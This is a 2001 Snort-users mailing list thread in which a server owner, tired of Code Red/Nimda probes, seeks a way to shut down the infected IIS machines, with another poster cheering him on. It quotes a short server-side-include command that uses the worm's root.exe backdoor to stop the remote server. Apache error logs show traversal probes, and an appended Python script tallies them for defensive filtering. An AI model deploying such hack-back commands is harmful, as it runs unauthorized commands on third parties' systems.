Snort mailing list archives
Re: Shut them down, I have had enough...
From: "Daniel Holden" <dholden () idsb net>
Date: Wed, 19 Sep 2001 01:04:26 +0100
I too would be very interested in this. I seem to get a lot of Code Red crap from the same sites. I've emailed them but nothing ever happens. I just get their automated email back. Screw them! If they can't take the time to clean their servers then I'm all for sending them something back in return.

----- Original Message -----
From: "Franki" <franki () gshop com au>
To: <snort-users () lists sourceforge net>
Sent: Wednesday, September 19, 2001 8:03 AM
Subject: [Snort-users] Shut them down, I have had enough...
Hi all,

I have seen in the past a php script that would shut down infected IIS servers that are trying to infect linux boxes. I haven't done it, because I didn't really think it was that nice a thing to do...

This is the one I saw...

1) Create a file called default.ida, in there add this:

<!--#exec cmd="lynx -source http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"-->

On one line, if it wraps in your mail client....

2) Then in your httpd.conf or similar... add this

AddType text/html .ida
AddHandler server-parsed .ida

but I checked my personal server this morning and the httpd error log looks like this. (see the end of the email)

anyway, I'd like to set up the server to shut down any IIS box that asks for cmd.exe or root.exe

Does anyone know how this can be done using either perl or php??? has anyone already done it? if so where can I find it???

I am tired of this, I have a very limited bandwidth, and even if it isn't doing any damage, it's chewing up the bandwidth.. and costing me money, as far as I am now concerned, they have three choices, either patch their server, pay my bandwidth bill, or get their servers shut down a lot...

Any help would be much appreciated.

Regards
Frank
Perth WA

[Wed Sep 19 14:47:27 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/c/winnt/system32/cmd.exe
[Wed Sep 19 14:47:28 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/d/winnt/system32/cmd.exe
[Wed Sep 19 14:47:31 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:47:33 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:47:34 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:47:40 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../winnt/system32/cmd.exe
[Wed Sep 19 14:47:42 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe
[Wed Sep 19 14:48:00 2001] [error] [client 203.47.134.211] File does not exist: /var/www/html/otherwebs/epay/default.ida
[Wed Sep 19 14:48:13 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/root.exe
[Wed Sep 19 14:48:14 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/MSADC/root.exe
[Wed Sep 19 14:48:15 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/c/winnt/system32/cmd.exe
[Wed Sep 19 14:48:16 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/d/winnt/system32/cmd.exe
[Wed Sep 19 14:48:18 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:48:19 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:48:21 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:48:23 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../winnt/system32/cmd.exe
[Wed Sep 19 14:48:24 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe

[root@mail httpd]# tail -50 error_log
[Wed Sep 19 14:53:18 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:18 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:19 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%2f../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/otherwebs/ezetax/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:21 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A?../winnt/system32/cmd.exe
[Wed Sep 19 14:53:21 2001] [error] [client 203.176.30.78] File does not exist: /var/www/html/otherwebs/ezetax/scripts/..%2f../winnt/system32/cmd.exe
[Wed Sep 19 14:53:22 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
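A defensive way to size up the traffic in the error log quoted above, added here as an example and not part of either poster's message: it tallies requests for cmd.exe, root.exe and default.ida per client so the noisiest sources can be rate-limited, filtered or reported. The function names and the sample log (with documentation-range addresses) are constructed for illustration.

```python
import re
from collections import Counter, defaultdict

# Constructed sample in the Apache error_log format quoted in the thread;
# client addresses are documentation-range placeholders, not the thread's.
SAMPLE_LOG = """\
[Wed Sep 19 14:47:27 2001] [error] [client 192.0.2.10] File does not exist: /var/www/html/c/winnt/system32/cmd.exe
[Wed Sep 19 14:47:31 2001] [error] [client 192.0.2.10] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:48:00 2001] [error] [client 198.51.100.7] File does not exist: /var/www/html/otherwebs/epay/default.ida
[Wed Sep 19 14:48:13 2001] [error] [client 192.0.2.10] File does not exist: /var/www/html/scripts/root.exe
[Wed Sep 19 14:49:02 2001] [error] [client 203.0.113.5] File does not exist: /var/www/html/favicon.ico
"""

LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[0-9.]+)\] "
    r"File does not exist: (?P<path>.+)$"
)
# Final path component of the probe requests seen in the thread's log.
PROBE_RE = re.compile(r"/(cmd\.exe|root\.exe|default\.ida)$", re.IGNORECASE)


def summarize_probes(log_text):
    """Return {client_ip: Counter({probe_name: hits})} for probe requests."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a "File does not exist" entry
        # Logs pasted through mail can pick up a stray space inside the path.
        path = m.group("path").replace(" ", "")
        probe = PROBE_RE.search(path)
        if probe:
            hits[m.group("ip")][probe.group(1).lower()] += 1
    return dict(hits)


def noisy_clients(summary, threshold=2):
    """Clients with at least `threshold` probe hits, busiest first."""
    totals = {ip: sum(c.values()) for ip, c in summary.items()}
    return sorted((ip for ip, n in totals.items() if n >= threshold),
                  key=lambda ip: (-totals[ip], ip))


if __name__ == "__main__":
    summary = summarize_probes(SAMPLE_LOG)
    for ip in noisy_clients(summary, threshold=1):
        print(ip, dict(summary[ip]))
```

The per-client totals are the evidence an abuse contact or upstream provider needs, and the same list can drive a local filter for the offending sources.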